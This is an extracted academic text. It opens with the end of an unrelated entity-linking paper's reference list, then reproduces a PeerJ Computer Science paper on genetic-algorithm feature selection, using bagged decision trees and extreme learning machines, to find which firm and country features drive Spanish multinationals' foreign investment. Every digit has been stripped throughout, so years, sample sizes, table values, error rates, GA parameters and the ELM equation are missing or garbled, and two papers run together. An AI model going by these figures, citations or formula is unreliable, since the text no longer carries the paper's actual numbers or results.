h. witten. . learning to link with wikipedia. in conference on information and knowledge management, pages – . ndapandula nakashole, tomasz tylenda, and gerhard weikum. . fine-grained semantic typing of emerging entities. in annual meeting of the associa- tion for computational linguistics, pages – . máté pataki, miklós vajna, and attila marosi. . wikipedia as text. ercim news, ( ): – . fernando pereira, naftali tishby, and lillian lee. . distributional clustering of english words. in annual meeting of the association for computational linguis- tics, pages – . francesco piccinno and paolo ferragina. . from tagme to wat: a new entity annotator. in sigir workshop on entity recognition and disambiguation, pages – . will radford, will cannings, andrew naoum, joel noth- man, glen pink, daniel tse, and james r. curran. . (almost) total recall – sydney cmcrc at tac . in text analysis conference. will radford. . named entity linking using rich knowledge. ph.d. thesis, the university of sydney. lev ratinov, dan roth, doug downey, and mike ander- son. . local and global algorithms for disam- biguation to wikipedia. in annual meeting of the as- sociation for computational linguistics, pages – . gerard salton and christopher buckley. . term- weighting approaches in automatic text retrieval. in- formation processing and management, ( ): – . wei shan, jiawei han, and jianyong wang. . a probabilistic model for linking named entities in web text with heterogeneous information networks. in in- ternational conference on mangement of data, pages – . wei shen, jianyon wang, and jiawei han. . entity linking with a knowledge base: issues, techniques, and solutions (to appear). transactions on knowledge and data engineering. clay shirky. . cognitive surplus: creativity and generosity in a connected age. allen lane, london. sameer singh, amarnag subramanya, fernando pereira, and andrew mccallum. . wikilinks: a large- scale cross-document coreference corpus labeled via links to wikipedia. technical report um-cs- - , university of massachusetts. merine thomas, hiroko bretz, thomas vacek, ben hachey, sudhanshu singh, and frank schilder. . newton: building an authority-driven company tag- ging and resolution system (in press). in emma tonkin and stephanie taylor, editors, working with text: tools, techniques and approaches for text min- ing. chandos, oxford, uk. erik f. tjong kim sang and fien de meulder. . in- troduction to the conll- shared task: language- independent named entity recognition. in conference on computational natural language learning, pages – . vasudeva varma, praveen bysani, kranthi reddy, vijay bharat, santosh gsk, karuna kumar, sudheer kove- lamudi, kiran kumar n, and nitin maganti. . iiit hyderabad at tac . in text analysis con- ference. peerj-cs- .. advanced feature selection to study the internationalization strategy of enterprises Álvaro herrero , alfredo jiménez and roberto alcalde departamento de ingeniería informática, universidad de burgos, burgos, spain department of management, kedge business school, bordeaux, france departamento de economia y administración de empresas, universidad de burgos, burgos, spain abstract firms face an increasingly complex economic and financial environment in which the access to international networks and markets is crucial. to be successful, companies need to understand the role of internationalization determinants such as bilateral psychic distance, experience, etc. cutting-edge feature selection methods are applied in the present paper and compared to previous results to gain deep knowledge about strategies for foreign direct investment. more precisely, evolutionary feature selection, addressed from the wrapper approach, is applied with two different classifiers as the fitness function: bagged trees and extreme learning machines. the proposed intelligent system is validated when applied to real-life data from spanish multinational enterprises (mnes). these data were extracted from databases belonging to the spanish ministry of industry, tourism, and trade. as a result, interesting conclusions are derived about the key features driving to the internationalization of the companies under study. this is the first time that such outcomes are obtained by an intelligent system on internationalization data. subjects data mining and machine learning, data science keywords evolutionary feature selection, bagged decision trees, extreme learning machines, internationaliza-tion, multinational enterprises introduction many companies nowadays invest and conduct activities in multiple foreign markets. however, a successful internationalization strategy is far from easy in a global environment currently characterized by increasing complexity of networks and interconnections and growing competition (johanson & vahlne, ; vahlne, ; vahlne & bhatti, ). for these reasons, international strategy requires accurate and insightful information on the main determinants driving foreign investments to be able to implement the most appropriate decisions. specifically, one of the first and foremost relevant decisions is the selection of the target market. a carefully crafted international investment operation can go completely wrong if the location is not correct. accordingly, international business scholars have paid great attention to the study of the determinants of internationalization, notably of foreign direct investment (fdi) operations. among the myriad of factors playing a relevant role in the firm’s choice of an oversea market, previous studies have highlighted that in addition to firm features such as the industry to which the company belongs, the profitability or the size, and the specific characteristics of the country in terms of macroeconomic figures such as the gross how to cite this article herrero Á, jiménez a, alcalde r. . advanced feature selection to study the internationalization strategy of enterprises. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted january published march corresponding author Álvaro herrero, ahcosio@ubu.es academic editor arkaitz zubiaga additional information and declarations can be found on page doi . /peerj-cs. copyright herrero et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:ahcosio@�ubu.�es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ domestic product (gdp), gdp per capita, etc., the concepts of bilateral psychic distance (dow & karunaratna, ; johanson & vahlne, ) and experience (clarke, tamaschke & liesch, ; jiménez et al., ) have a notorious influence. due to managerial bounded rationality (barnard & simon, ), exploring the various possible configurations of variables that may play a critical impact on internationalization is a complicated task that cannot be performed efficiently. managers in charge of their firm’s internationalization, but also policy-makers aiming to attract higher inflows of foreign investments, need to build on sophisticated tools that can extract more insightful information. to face this challenging issue, the application of artificial intelligence (ai) techniques has been previously proposed (herrero & jiménez, ). a wide variety of ai techniques has been previously applied, ranging from artificial neural networks (hsu & huang, ; contreras, manzanedo & herrero, ) to particle swarm optimization (simić et al., ). in the present paper, a combination of machine learning methods is proposed. differentiating from previous work where unsupervised learning is proposed (herrero, jiménez & bayraktar, ), in the present paper feature selection (fs) (john, kohavi & pfleger, ) is proposed in order to identify the subset of features that best characterize internationalization strategies of companies. to do so, advanced classifiers based on bagged decision trees (bdts) and extreme learning machines (elms), are applied. these supervised-learning methods are used to model the fitness function of a fs schema, where an evolutionary algorithm is applied in order to generate different combinations of features in order to predict the internationalization decision of companies with high accuracy. furthermore, obtained results are also compared with those from other machine learning methods that have been previously applied (jiménez & herrero, ) to the same dataset. similar, yet different, solutions comprising genetic fs have also been proposed for problems in other fields such as health (salcedo-sanz et al., ; maleki, zeinali & niaki, ), bio-informatics (chiesa et al., ) or credit rating (jadhav, he & jenkins, ) among others. artificial intelligence methods have been previously applied to fs (saad, ); although they are one of the newest proposals in the field of neural networks, elms have been previously applied as classifiers under the frame of evolutionary fs, since the seminal work was published (meng-yao et al., ). fs based on both basic elm and optimally pruned elm was applied in termenon et al. ( ) and chyzhyk, savio & graña ( ), where the data features were extracted from brain magnetic resonance imaging. in termenon et al. ( ) the elm-based fs was applied under the frame of an image biomarker identification system for cocaine dependance, while in chyzhyk, savio & graña ( ) it was applied to better diagnose patients suffering from alzheimer’s disease. results were compared to those obtained by support vector machines, k-nearest neighbour, learning vector quantization, relevant vector machines, and dendritic computing. in xue, yao & wu ( ) a variant of elms called error-minimized elm (em-elm) is applied to measure the quality of each one of the subsets of features generated by a genetic herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm. the proposed fs method is compared to some other machine learning methods that do only include one (c . ) basic decision tree. furthermore, results are obtained from benchmark datasets, none of them from the economics domain. in wang et al. ( ), elms have been proposed for fs once again, but combined with particle swarm optimization, for regression. although the bootstrap aggregation (bagging) of decision trees has been also applied to fs (panthong & srivihok, ), to the best of the authors knowledge, it has never been compared to elm for this purpose. thus, going one step forward to the previous work, two advanced fs methods are applied in the present paper to a real-life dataset on company internationalization and their results are compared to those previously obtained by some other fs methods. the internationalization of companies has been previously researched by machine learning methods; in rustam, yaurita & segovia-vergas ( ) a dataset of spanish firms is analyzed by support vector machines (svms) in order to predict the success of internationalization procedures. that is, svms are applied in order to differentiate between successful and failed internationalization of manufacturing companies. differentiating from this previous work, the present paper proposes advanced fs to gain deep knowledge about the key features that are considered by companies in order to invest in a foreign country. the addressed topic of internationalization is explained in “literature review”, while the machine learning methods proposed and applied are described in “materials and methods”. obtained results are compiled and discussed in “results and discussion” and the conclusions derived from them are presented in “conclusions”. literature review the internationalization of firms is a complex managerial problem in which multiple factors need to be accounted for. as previously mentioned, both company-level and country-level characteristics can have a significant influence. companies will find a very different environment depending which country invest and, conversely, a given host country will present different opportunities and threats to companies depending on the firms‘ specific resources and capabilities. accordingly, both levels, company and country, need not to be overlooked. among the various determinants of the location choice of multinational enterprises, two constructs have been recently highlighted by scholars given their significance. thus, recent studies have shown that experience (padmanabhan & cho, ), at the company-level, and bilateral psychic distance (clavel san emeterio et al., ; håkanson et al., ; nordman & tolstoy, ; yildiz & fey, ), at the country one, are particularly important for the majority of multinational enterprises (mnes). furthermore, international business scholars have called for further attention to the multi-dimensional nature of these constructs, warning against the classic and somewhat simplistic perspective taken in many studies in which a single dimension is analyzed and supposed to capture the full effect (dow & karunaratna, ; jiménez et al., ; berry, guillén & zhou, ; pankaj, ; puthusserry, child & rodrigues, ). herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ thus, in the early studies on international trade and investment, distance between countries (home and host) was uniquely conceptualized in terms of geography, building on the so-called “gravity model” (tinbergen & hekscher, ; kleinert & toubal, ). shortly after, scholars added the effect of cultural distance (hofstede, hofstede & minkov, ; kogut & singh, ; barkema, bell & pennings, ). despite the improvement and success of studies incorporating the effect of cultural distance, recent advances in the field have shown that the true determinant of the location choice is the concept of psychic distance (tung & verbeke, ), which is a broader construct encompassing cultural distance (dow & karunaratna, ). the concept of psychic distance was popularized by the uppsala school (johanson & vahlne, , ; johanson & wiedersheim-paul, ; vahlne & johanson, ; nordstrom & vahlne, ; vahlne & nordström, ) and it is typically defined as “the sum of factors preventing the flow of information from and to the market. examples are differences in language, education, business practices, culture, and industrial development” (johanson & vahlne, ). nordstrom & vahlne ( ) further develop the concept by emphasizing learning and understanding the foreign market instead of simply accessing the information. originally, thus, the emphasis of this literature stream was on the link between great psychic distance and the liability of foreignness, but recent extensions of the model have started to emphasize also how psychic distance also affects the establishment of relationships, and the evolution of other aspects such as r&d, and organizational and strategic change processes (johanson & vahlne, ; vahlne & johanson, ; brewer, ). psychic distance has been shown to be significant for various firm-related outcomes such as fdi location (ojala & tyrväinen, ; blomkvist & drogendijk, ; magnani, zucchella & floriani, ), subsidiary performance (dikova, ), entry mode (dow & larimo, ; dow & ferencikova, ), ownership in acquisitions (chikhouni, edwards & farashahi, ), innovation (azar & drogendijk, ) or export and trade (klein & roth, ). we present in table a review of these empirical studies on psychic distance. as it can be observed from table , all of the works employ traditional, deductive statistical estimation techniques. as choudhury, allen & endres ( ) highlight, machine learning techniques, drawing on abductive and inductive research, offer a complementary perspective that permits the observation and identification of data patterns that other techniques, such as the classic deductive regressions, can overlook due to their constraints to fit the data into pre-determined models. we precisely aim to adopt such perspective to assess the relevance of diverse firm-level and country-level factors in order to contribute to the study of firm internationalization. psychic distance comprises both the individual perceptions of distance of a given individual, shaped by the macro-level factors that form those perceptions (dow & karunaratna, ; brewer, ; dow & ferencikova, ; ambos, leicht-deobald & leinemann, ; bhowmick, ). we follow one of the most influential frameworks of psychic distance proposed in the literature, the one by dow & karunaratna ( ) published in the leading international business journal (journal of international business studies), in which six different dimensions (called stimuli) are proposed. specifically, these herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table synthesis of the literature on psychic distance. author year sample and estimation technique scope of the article klein & roth firms in canada (multinomial logit model) the authors analyze the impact of experience and psychic distance as predictors of export decision, differentiating between conditions of high vs low asset specificity dow & karunaratna country pairs trade flows among a set of nations (multiple regression model) the authors develop and test psychic distance stimuli including differences in culture, language, religion, education, and political systems. they find that these measures are better predictor than a composite measure of hofstede’s cultural dimensions chikhouni, edwards, & farashahi , full and partial acquisitions from countries (tobit regression) the authors find that the direction of distance moderates the relationship between distance and ownership in cross-border acquisitions. besides, they also find significant differences when the acquisition is made by an emerging country multinational compared to when it is made by a developed country one dikova foreign direct investments made in central and eastern europe (ordinary least-squares regression) the author obtains empirical evidence supporting a positive relationship between psychic distance and subsidiary performance in the absence of market specific knowledge. however, psychic distance has no effect on subsidiary performance when the firm has prior experience in the region or when it has established the subsidiary with a local partner dow & larimo , investments made by firms in host countries (binary logistic regression) the authors argue that a more sophisticated conceptualization and operationalization of the concepts of distance and international experience increases the ability to predict entry mode, the lack of which is the reason for ambiguous results in previous research ojala & tyrvainen finnish small and medium firms (stepwise multivariable linear regression) the authors examine the relevance of cultural/psychic distance, geographical distance, and several aspects related to market size as predictors of the target country preference of smes in the software industry prime, obadia, & vida. french manufacturing firms (qualitative study) the authors critically review the concept of psychic distance and contend that the inconsistent results in previous literature are due to weaknesses in its conceptualization, operationalization, and measurement. building on their grounded theory-based qualitative study with export managers in french manufacturing companies, the authors propose that psychic distance stimuli should cultural issues (i.e., patterns of thought, behaviors, and language prevailing in the foreign markets) and issues pertaining to the business environment and practices (i.e., relationships with businessmen; the differences in business practices; and the local economic, political, and legal environment) dow & ferencikova fdi ventures in slovakia from potential home countries (logistic regression and multiplevariable linear regression). in this paper the authors employ psychic distance stimuli to analyze fdi market selection, entry mode choice and performance. the find strong empirical support for a significant effect of psychic distance on both market selection and fdi performance, but the results for entry mode choice are ambiguous blomkvist & drogendijk chinese outward fdi (ordinary least squares regression) the authors analyze how psychic distance stimuli in language, religion, culture, economic development, political systems, education, plus geographic distance affect chinese ofdi and find that aggregated psychic distance and certain individual stimuli are significant predictors azar & drogendijk export ventures into international markets by swedish companies (structural equation models) the authors show that psychic distance has a positive effect on innovation. firms that perceived a high level of differences in psychically distant markets are more likely to introduce technological and organizational innovations in order to reduce uncertainty. furthermore, they also find that innovation mediates the relationship between psychic distance and firm performance (continued) herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ authors posit that the individual perceptions of psychic distance are shaped by the country differences in education, industrial development, language, democracy, social system, and religion. finally, at the company level, we also rely on recent advances in the literature in which studies have shown that the role of experience is much more complex than initially thought (clarke, tamaschke & liesch, ). thus, scholars have shown the great influence of the knowledge that firms can obtain from the experience of other firms (jiang, holburn & beamish, ). drawing on organizational learning theory (cyert & march, ; huber, ; levitt & march, ), companies are able to observe the behavior of other companies and obtain valuable information for their own strategy formulation and implementation by learning from best practices and mistakes and establishing collaborations (argote, beckman & epple, ; lieberman & asaba, ; terlaak & gong, ). especially when other firms share a key characteristic with the focal company (for example the country of origin or the industry to which they belong (jiménez & de la fuente, )), their previous actions represent a valuable source of information about expected challenges and opportunities, good and bad practices and networking opportunities (terlaak & gong, ; meyer & nguyen, ). overall, a correct internationalization strategy is complicated and elusive given the multitude of factors playing a role and their multi-dimensional nature, which calls for further examination of their particular importance. a finer-grained analysis of the determinants of fdi location by multinational companies can provide insightful information to prospective managers who need to make critical decisions that can determine the success, performance, viability and even survival of their enterprises. table (continued) author year sample and estimation technique scope of the article puthusserry, child, & rodrigues british smes and their indian partner smes in international business (qualitative methodology) the authors investigate inter-partner perceptions of psychic distance between britain and india, examining different dimensions of psychic distance, their impact and modes of coping with them. they find that culturally embedded psychic distance dimensions tend to have less impact and to be easier to cope with than institutionally embedded dimensions and identify four coping mechanisms magnani, zucchella, & floriani multiple case study methodology (italy and brazil). the authors analyze the role of firm-specific strategic objectives as determinants of foreign market selection together with objective distance and psychic distance ambos, leicht- deobald, & leinemann managers located in countries (hierarchical linear modeling) the authors analyze the formation of psychic distance perception and find that that country-specific international experience, formal education, and the use of common language reduce psychic distance perceptions. in contrast, international experience and overall work experience do not have a significant effect. besides, they find that individual-level antecedents have lower explanatory level compared to country-level ones dinner, kushwaha, & steenkamp firms based in countries (event study methodology) the authors investigate the role pf psychic distance when multinational enterprises face foreign marketing crises. they find that the relationship between psychic distance and firm performance during marketing crises has a curvilinear shape and that marketing capabilities moderate this relationship herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ materials and methods the present work aims at obtaining the most relevant features from enterprise-country data that will provide enterprise managers with the information to take decisions on internationalization. in this paper we employ a sample of firms coming from two sources belonging to the spanish ministry of industry, tourism, and trade and the website of the foreign trade institute (icex) (icex spain import and investments, ). we compiled a sample of independent multinational firms operating in overseas markets by conducting fdi operations. since small and medium firms have distinct capabilities and face specific challenges in terms of access to funding to internationalize, we focus on large firms and follow the well-established criterion of having employes at least (jiménez, ). we also focus on investments before to prevent distortions in the results due to the impact of the subsequent financial crisis (jiménez et al., ). following previous studies on the internationalization of spanish multinationals, we collected the following variables for each foreign subsidiary of the companies in our sample: � characteristics from host country such as unemployment, total inward fdi, gdp, growth, and population. � bilateral geographic distance as measured in the cepii database (centre d’Études prospectives et d’informations internationales (cepii), ). � psychic distance stimuli between countries. we include all dimensions identified by dow & karunaratna ( ): education, industrial development, language, democracy, political ideology, and religion. the first one, education, measures the differences on education enrollment and literacy between the two countries building on data from the united nations. the second one, industrial development, is the principal component result of ten factors including differences in the consumption of energy, vehicle ownership, employment in agriculture, the number of telephones and televisions, etc. the third one, language, measures the genealogical distance between the dominant languages in the countries and the percentage of population in each country speaking the language of the other. the fourth one, democracy, is based on the similarities in terms of political institutions, civil liberties, and the polcon and polity iv indices. the fifth one, political ideology, measures the differences in the ideologies of the executive powers in each country. finally, the sixth one, religion, measures the differences in terms of the predominant religion between the countries and the percentage of followers of that religion on the other country. comprehensive data for all the variables across the majority of countries in the world can be found at (dow, ). similarly, a more detailed description of the procedure to calculate the various psychic distance dimensions can be found at that website and at the seminal paper by dow & karunaratna ( ). � vicarious experience: following the previous literature on vicarious experience (jiménez & de la fuente, ; jiang, sui & cao, ) we employ the total count of other spanish mnes present in the host country as our measure of vicarious experience. we distinguish between same-sector vicarious experience (total count of other spanish herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mnes in the host country belonging to the same sector), different-sector vicarious experience (total count of other spanish mnes in the host country belonging to a different sector) and total vicarious experience (the addition of same-sector and different-sector vicarious experience). � firm product diversification: we distinguish between three alternatives, namely related product diversification, unrelated product diversification, and single-product firms (ramanujam & varadarajan, ; kumar, ). � industry: we identify five main groups including manufacturing, food, construction, regulated, and unclassified sectors. � other firm characteristics: return on equity, number of countries where the firm operates, number of employes, and whether or not the firm is included in a stock market. all in all, data from , samples, compressing features, were collected. features from countries are: . geographic distance (log) . psychic distance—education . psychic distance—industrial development . psychic distance—language . psychic distance—democracy . psychic distance—social system . psychic distance—religion . unemployment . fdi/gdp . gdp growth . population (log) features from companies themselves are: . vicarious experience . vicarious experience same sector . vicarious experience different sector . manufacturing . food . construction . regulated . financial . employees . roe . stock market herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . related diversification . unrelated diversification . number of countries general statistics about the dataset under study are shown in table . obtaining knowledge about decision making regarding the internationalization of companies is a challenging task that perfectly suits feature selection (fs). there are mainly two methods from the machine learning field that are able to identify the key characteristics of a given dataset. feature extraction is one of the alternatives, but it is not suitable for the present work as it generates new features from the dataset that are not in the original data. in the present work, the target is to select some of the features from the original dataset as conclusions can be generalized and obtained knowledge applied to other problems (i.e., set of companies). thus, feature selection is the most appropriate method in the present study. hence, some advanced fs proposals are applied in the present research with the aim of identifying the key characteristics that lead to positive or negative internationalization decisions. in general terms, fs consists of a learning algorithm and an induction algorithm. the learning algorithm chooses certain features (from the original set) upon which it can focus its attention (john, kohavi & pfleger, ). only those features identified as the most relevant ones are then selected, while the remaining ones are discarded. additionally, there is also an induction algorithm that is trained on different combinations of features (from the original dataset) and aimed at minimizing the classification error from the given features. building on choudhury, allen & endres ( ), supervised machine learning is applied in the present work as the induction algorithm. under the frame of fs, for every original feature, two different levels of relevance (weak and strong) can be defined (kohavi & john, ). a feature is assigned a strong-relevance level if the error rate obtained by the induction algorithm increases significantly and a weak-relevance level is assigned otherwise. in keeping with this idea, strong-relevance features are to be selected from the internationalization dataset in order to know which ones are the most important ones when taking internationalization decisions. there are three different ways of coordinating the learning and induction algorithms: embedded, filter and wrapper. the wrapper scheme (kohavi & john, ) has been applied in the present work, being the induction algorithm wrapped by the learning algorithm. that is, the induction algorithm can be considered as a “black box” that is applied to the different combinations of original features that are generated. this perfectly suits the addressed problem because the internationalization decision can be modeled as the target class, being a binary classification problem. as a consequence, well-known and high-performance binary classifiers can be used as induction algorithms. additionally, the selection of features done by the different induction algorithms can be compared and interesting conclusions from the management perspective can be derived. herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ according to that, different classifiers have been applied as induction algorithms in order to predict the class of the data. in the present paper, both bagged decision trees and extreme learning machines are applied. furthermore, results obtained by these two methods are compared to those previously generated (jiménez & herrero, ) by random forest (rf) and svm on the very same dataset. the classifiers are fed with datasets containing the same data instances as in the original dataset but comprising a reduced number of features. in order to generate different combinations of them, standard genetic algorithms (gas) (goldberg, ) have been applied in the present paper. the main reason for choosing such approach is that, when dealing with big datasets, it is a powerful mean of reducing the time for finding near- optimal subsets of features (siedlecki & sklansky, ). when modeling the problem under this perspective, the different solutions to be considered (selected features, in the present research) are codified as n-dimensional binary vectors, being n the total number of features in the original dataset. in a fs problem, a value of is assigned to a given feature if it is not present in the feature subset and table descriptive statistics about the analyzed dataset. feature max min mean std. dev. geographic distance (log) . . . . psychic distance—education . . . . psychic distance—industrial development . . . . psychic distance—language . − . − . . psychic distance—democracy . . . . psychic distance—social system . . . . psychic distance—religion . − . − . . unemployment . . . . fdi/gdp . − . . . gdp growth . − . . . population (log) . . . . vicarious experience . . . . vicarious experience same sector . . . . vicarious experience different sector . . . . manufacturing . . . . food . . . . construction . . . . regulated . . . . financial . . . . employees . . . . roe . − . . . stock market . . . . related diversification . . . . unrelated diversification . . . . number of countries . . . . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ otherwise. once representation of solutions is defined, the ga (as defined in fig. below) is applied. in standard gas, two operators (mutation and crossover) are usually applied depending on a previously stated probability (experimentation has been carried out with different values as explained in “results and discussion”). additionally, when modeling a ga figure flowchart of a standard genetic algorithm for wrapper feature selection. full-size doi: . /peerj-cs. /fig- herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (kramer, ), the fitness function is also defined, as the criteria to measure the “goodness” of a given solution, that is its quality. in the case of fs, the fitness function is usually defined as the misclassification rate of the classifier when applied to the dataset compressing the features in the solution to be evaluated. as a result, the best solution is selected, being the one with the lowest value calculated with the fitness function. that is, the combination of features that led the given classifier to get the lowest error when being tested. as previously mentioned, some different classifiers have been applied, being the novel ones described below. decision trees (dts) (safavian & landgrebe, ) are one of the most popular machine-learning methods. they have been successfully applied, proving to be valuable tools for different tasks such as classification, generalization, and description of data (sreerama, ). being trees, they are composed of nodes and arches, as shown in fig . nodes in a dt can be of two different types; internal and leaf. the first ones are those aimed at differentiating responses (branches) for a given question. in order to address it, the tree takes into account the original training dataset; more precisely, the values of a certain feature. on the other hand, leaf nodes are associated to the final decision (class prediction) and hence they are assigned a class label. all internal nodes have at least two child nodes and when all of them have two child nodes, the tree is binary. both parent/child arches and leaf nodes are connected: the first ones are labeled according to the responses to the node question and the second ones according to the classes or the forecast value. in the present research, performance of dts is improved by a booststrap (efron & tibshirani, ) aggregation (bagging) strategy, resulting in a bagged dt (bdt). within this tree ensemble, every tree is grown on an independently drawn bootstrap subset of the data. those data that are not included in this training subset are considered to be “out of bag” (oob) for this tree. the oob error rate is calculated in order to validate the bdt for each individual (subset of features). for such calculation, training data are not used but those oob data instances instead. figure sample structure of a decision tree. full-size doi: . /peerj-cs. /fig- herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in order to speed up the training of feedforward neural networks (ffnn), extreme learning machines (elms) were proposed (huang, zhu & siew, ). these neural nets can be depicted as: the functioning of such network can be mathematically expressed as: xm i¼ bigi xj � � ¼ xm i¼ big wi � xj þ bi � � ¼ oj; j ¼ ; : : :; n; ( ) being xj the jth input data, m the number of hidden nodes ( in fig. ), wi the weight vector connecting the input and hidden nodes, bi the weight vector connecting the hidden and output nodes, bi the bias of the ith node, giðÞ the activation function of the ith hidden node, and oj the output of the net for the jth input data. the elm training algorithm is pretty simple and consists of the following steps: � assign arbitrary input weights (wi) and bias (bi). � calculate the hidden layer output by applying the activation function on the weighted product of input values. � calculate the output weights (bi). to reduce training time, elms are designed as single-hidden layer nets which analytically determine the output weights and randomly choose their hidden nodes. the main consequence of this is that learning speed can be thousands of times faster than traditional ffnn training algorithms like the well-known back-propagation. unlike the well-known training algorithms based on gradient-based (they try to minimize training error without considering the magnitude of weights), the elm training algorithm reaches the smallest training error and norm of weights, at the same time. as a side effect, the model also has a good generalization performance and is consequently considered an advisable learning model (for both classification and regression) mainly in those applications when many training processes have to be launched (as in the present case of evolutionary fs). figure sample topology of an elm. full-size doi: . /peerj-cs. /fig- herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it is widely acknowledged that one of the main disadvantages of ffnn is that all the parameters need to be tuned. in the case of elms, both the hidden layer biases and input weights are randomly assigned, obtaining acceptable error rates. all the methods previously described in this section have been implemented and run on matlab software. for the elms the original matlab implementation (extreme learning machines, ) has been adapted to the fs framework. results and discussion as previously explained, a standard ga has been applied to optimize the search of best features subsets. its most usual parameters were tuned in different combinations, taking the following values: � population size: , , . � number of generations: , , . � mutation probability: . , . , . . � crossover probability: . , . , . . � selection scheme: tournament. to get more reliable results, the same combination of values for the parameters above have been used to run the genetic algorithm times (iterations). as stated in “materials and methods”, the misclassification rate of the classifier has been used as the fitness function to select the best solutions (subset of features). according to the given values of such function, in each experiment the feature subset with the lowest error rate has been selected. results are shown in this section for the two classifiers that are applied for the first time (bdt and elm), as well as those for the two previous ones: svm and rf (jiménez & herrero, ), to ease comparison. the ga parameter values and the misclassification rate (error) of the best individuals for each one of the classifiers are shown in table . additionally, for bdts, trees were built in each iteration and in the case of elms, both sigmoidal and sinusoidal functions have been benchmarked as activation functions of the hidden nodes. a varying number of such nodes has been tested as well for each experiment, including , , , , , , and units. table parameters values of the ga and misclassification rate associated to the best individual for each classifier. parameter set values svm rf bdt elm population size number of generations mutation probability . . . . crossover probability . . . . misclassification rate . . . . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the case of bdts, the best individual (misclassification rate of . ) comprises the following features: “vicarious experience same sector”, “manufacturing”, “food”, “construction”, “unrelated diversification”, and “number of countries”. in the case of elms, the best individual (misclassification rate of . ) can be considered as very robust as it was the best one obtained with both sigmoidal (elm—sig) and sinusoidal (elm—sin) output functions and a high number of output neurons ( and respectively). the one obtained with the sigmoidal function comprises the following ones: “vicarious experience same sector”, “manufacturing”, “food”, “construction”, “regulated”, “financial”, “employees”, “unrelated diversification”, and “number of countries”. in the case of the sinusoidal function (elm—sin), the following features define the best individual: “vicarious experience same sector”, “manufacturing”, “food”, “construction”, “regulated”, “financial”, “psychic distance—language”, “roe”, and “number of countries”. best individuals obtained by bdt and elm share the following features: “vicarious experience same sector”, “manufacturing”, “food”, “construction”, “financial”, and “number of countries”. when considering the classifiers, the following features are included in all the best individuals “manufacturing”, “food”, and “number of countries”. on the contrary, “psychic distance – education” and “unemployment” have not been included in any of the best individuals. the number of features in the best individuals obtained in the different searches, and the average number of features in the best individuals obtained in all the ( ) iterations for the same parameters are shown in table . for further study of the obtained results on advanced feature selection, fig. shows a boxplot comprising the following information related to the iterations with the combination of parameter values that has generated the best individual in each case. comprised information includes: mean error, standard deviation error, error of the best individual, and number of features. from the enterprise management perspective, these results demonstrate the critical importance of vicarious experience, sector, and degree of internationalization as measured by the number of countries where the mne runs operations. product diversification, number of employes, and some dimensions of psychic distance are also relevant as they appear in multiple best individuals. however, the results also underline that it is important to disentangle these constructs into their different components, as not all of them are equally important. thus, the results show that the most critical variable is vicarious experience from other firms in the same sector, but not the one from firms in different table number of features in the best individuals for the different classifiers. classifier number of features best individual mean svm . rf . bdt . elm . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sectors. this idea is in line with those of jiang, holburn & beamish ( ) where it was shown that firms find vicarious experience from other firms in the same sector much more relevant, valuable, and easier to assimilate. in contrast, vicarious experience from firms in other sectors, while potentially useful (jiménez & de la fuente, ), it is much less applicable as managers will find it more difficult to assimilate and legitimize in front of other stakeholders (guillén, ). similarly, only unrelated diversification appears as relevant, but not related diversification. further, it is worth noting that only one dimension of psychic distance (i.e., in language) appears as relevant. among the multiple dimensions, our findings emphasize the importance of communication and the prevention of misunderstandings with other agents in the markets such as customers, suppliers or governments. this result is consistent with recent studies emphasizing the importance of language distance in international business (dow, cuypers & ertug, ; jimenez, holmqvist & jimenez, ). although the relative lack of relevance of several psychic distance stimuli is somewhat surprising given the amount of studies showing that great psychic distance is detrimental to firms, it is possible that these negative effects are offset by potential positive ones. some authors have reported that firms devote more resources to research and planning when psychic distance is greater (evans & mavondo, ), whereas when the countries are similar, firms might be complacent and overestimate the similarities, leading to the so-called “psychic distance paradox” (o’grady & lane, ; magnusson, schuster & taras, ). in fact, various authors consider that firms might take advantage of greater distance as a source of talent and/or knowledge not available in closer markets figure boxplots of outputs from iterations on bdt, elm—sig, and elm—sin that have obtained the best results: (a) number of features (in magenta) and (b) average error (in red), standard deviation of the error (in green), and error of the best individual (in blue). full-size doi: . /peerj-cs. /fig- herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (nachum, zaheer & gross, ) or opportunities for arbitrage, complementarity and creative diversity (pankaj, ; ghemawat, ; shenkar, luo & yeheskel, ; 